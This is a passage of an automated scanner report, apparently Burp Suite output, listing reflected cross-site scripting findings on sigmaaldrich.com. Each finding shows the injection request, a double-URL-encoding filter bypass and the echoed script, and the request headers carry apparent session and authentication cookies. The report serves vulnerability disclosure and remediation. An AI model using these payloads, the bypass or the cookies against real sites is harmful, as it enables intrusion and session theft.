bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:10 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/author/site-level/mobile.htmleb38a";alert(1)//da771394f7e","E404") ;
   </script>
...[SNIP]...

1.40. http://www.sigmaaldrich.com/catalog/Lookup.do [F parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /catalog/Lookup.do

Issue detail

The value of the F request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4d81'-alert(1)-'d59568379a8 was submitted in the F parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PRc4d81'-alert(1)-'d59568379a8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 18:06:01 GMT
Connection: close
Set-Cookie: JSESSIONID=3E41DB1598B528ABFE9A0997CD00C873.stltcat02b; Path=/catalog
Content-Length: 46377


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
   <head>    
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
   
       
   <TITLE>Search Results</TITLE>

   
...[SNIP]...
<script type="text/javascript">
   var selectTab='PRc4d81'-alert(1)-'d59568379a8';
   if(selectTab=='PR'){
       productResultSelected();
   }
   else if(selectTab=='TD'){
       techDocSelected();
   }
   else if(selectTab=='SC'){
       siteContentSelected();
   }
   else if(selectTab=='AA'){
       AnalAppSele
...[SNIP]...

1.41. http://www.sigmaaldrich.com/catalog/Lookup.do [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /catalog/Lookup.do

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c7ff%2522%253balert%25281%2529%252f%252fb2ff7a30651 was submitted in the REST URL parameter 1. This input was echoed as 1c7ff";alert(1)//b2ff7a30651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /catalog1c7ff%2522%253balert%25281%2529%252f%252fb2ff7a30651/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:08 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/catalog1c7ff";alert(1)//b2ff7a30651/Lookup.do","E404") ;
   </script>
...[SNIP]...

1.42. http://www.sigmaaldrich.com/catalog/search/SearchResultsPage [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /catalog/search/SearchResultsPage

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3d7%2522%253balert%25281%2529%252f%252f2cbd6686cf8 was submitted in the REST URL parameter 1. This input was echoed as 1d3d7";alert(1)//2cbd6686cf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /catalog1d3d7%2522%253balert%25281%2529%252f%252f2cbd6686cf8/search/SearchResultsPage?Query=%60&Scope=SearchAll HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sigmaaldrich.com
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:28 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28936


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/catalog1d3d7";alert(1)//2cbd6686cf8/search/SearchResultsPage","E404") ;
   </script>
...[SNIP]...

1.43. http://www.sigmaaldrich.com/chemistry.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69f7e%2522%253balert%25281%2529%252f%252fd5ddcb5ca40 was submitted in the REST URL parameter 1. This input was echoed as 69f7e";alert(1)//d5ddcb5ca40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /69f7e%2522%253balert%25281%2529%252f%252fd5ddcb5ca40 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:14 GMT
Content-Length: 28904
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/69f7e";alert(1)//d5ddcb5ca40","E404") ;
   </script>
...[SNIP]...

1.44. http://www.sigmaaldrich.com/chemistry/chemical-synthesis.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3111%2522%253balert%25281%2529%252f%252f60a8b7870b7 was submitted in the REST URL parameter 1. This input was echoed as d3111";alert(1)//60a8b7870b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryd3111%2522%253balert%25281%2529%252f%252f60a8b7870b7/chemical-synthesis.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:16 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryd3111";alert(1)//60a8b7870b7/chemical-synthesis.html","E404") ;
   </script>
...[SNIP]...

1.45. http://www.sigmaaldrich.com/chemistry/chemical-synthesis.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54009%2522%253balert%25281%2529%252f%252fb4cada2562 was submitted in the REST URL parameter 2. This input was echoed as 54009";alert(1)//b4cada2562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/54009%2522%253balert%25281%2529%252f%252fb4cada2562 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28913
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/54009";alert(1)//b4cada2562","E404") ;
   </script>
...[SNIP]...

1.46. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/chemical-synthesis-catalog.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/chemical-synthesis-catalog.html

Issue detail

